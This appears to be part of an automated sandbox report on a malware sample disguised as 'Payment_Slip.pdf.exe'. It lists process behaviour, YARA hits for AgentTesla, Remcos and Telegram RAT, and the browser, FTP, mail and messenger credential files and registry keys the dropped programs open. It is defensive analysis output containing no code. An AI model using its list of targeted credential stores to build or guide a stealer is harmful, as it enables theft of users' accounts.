Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Users\user\AppData\Roaming\host.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Users\user\AppData\Local\Temp\conserver.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040A0B0 GetLocalTime,wsprintfW, 11_2_0040A0B0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004195F8 GetUserNameW, 11_2_004195F8
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 11_2_004466BF
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0041739B GetVersionExW, 14_2_0041739B
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Remcos RAT
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_0040A953
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 17_2_0040A953
Contains functionality to steal Firefox passwords or cookies
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: \key3.db 11_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: \key3.db 17_2_0040AA71
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Roaming\host.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\host.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\conserver.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
